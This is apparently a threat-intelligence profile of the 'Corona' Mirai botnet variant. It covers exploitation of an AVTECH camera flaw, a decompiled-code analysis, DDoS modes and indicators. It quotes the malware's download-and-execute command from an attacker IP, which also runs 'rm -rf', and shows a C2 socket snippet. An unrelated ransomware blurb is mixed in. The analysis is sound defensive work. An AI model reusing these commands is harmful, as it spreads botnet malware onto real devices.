Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Une vaste campagne de botnet « Mirai » exploite une vulnérabilité zero-day d'exécution de code à distance (RCE) récemment divulguée (CVE-2024-7029) dans les fonctions de « luminosité » des caméras IP AVTECH. Cette vulnérabilité a été exploitée pour propager une variante de Mirai baptisée « Corona ». | Cette vulnérabilité a été exploitée pour propager une variante de Mirai baptisée « Corona ».
11 distinct techniques documented for this family, organized by ATT&CK tactic.
wget http: // 91 [ . ] 209 [ . ] 70 [ . ] 174 / Corona.x86_64; chmod 777 * ; . / Corona.x86_64 ROOTS; rm -rf * ; )
A mutex is used rather often in malware. It is generally used to check if the system is already infected. To avoid interfering with itself, the newest instance of the malware will then shut itself off. In this case, a different type of mutex is used.
The value 0xf is equal to PR_SET_NAME . This option requires only one additional parameter, which is also present in the decompiled code: a string. This string is the new name of the calling thread. This effectively changes the parent process’ name to 0x20 . The value 0x20 is, according to the ASCII table, a space. This makes the parent process hard to spot in a process overview.
The string that is created, contains more information on the infected device. It contains the name (which equals Corona ), the value at 0x510068 , the architecture ... and the value at 0x510004 . ... The value at 0x510068 is equal to myinfo.local_addres ... The value at 0x510004 is equal to myinfo.command_line_argument
The main socket is used to connect to the command & control server. If the connection is not made successfully, the bot prints the failure message, sleeps for 5 seconds, and then tries to connect the command & control server again. Upon a successfull connection, the endless loop is broken, the success message is printed, and the registermydevice function is called. | MainSockFD = socket ( AF_INET , SOCK_STREAM , 0 ) ; socketAddr. sin_family = 2 ; socketAddr. sin_port = htons ( ( uint16_t ) _bot_port ) ; socketAddr. sin_addr = inet_addr ( bot_host ) ; connectionResult = connect ( MainSockFD , ( sockaddr * ) & socketAddr , 0x10 ) ;
Distributed denial of service (DDoS) attacks can successfully deny the victim’s access to the internet for a period of time. Compromised servers can be used to launch such an attack. Additionally, the rise of infected smart devices that are connected to the internet, allow criminal actors to grow their botnets to sizes that were not seen before.
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Linux-based DDoS bot that connects to a command-and-control server, registers the infected device, gathers the local IP address, uses a bind/listen mechanism as a mutex to avoid duplicate instances, decrypts embedded command strings, and executes multiple attack modes including UDP, TCP, HTTP, STD, XMAS, and VSE floods.
A named Hakbit/Thanos-family variant/self-designation used in one ransom note sample. It appears as a rebranded variant within the Hakbit lineage.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.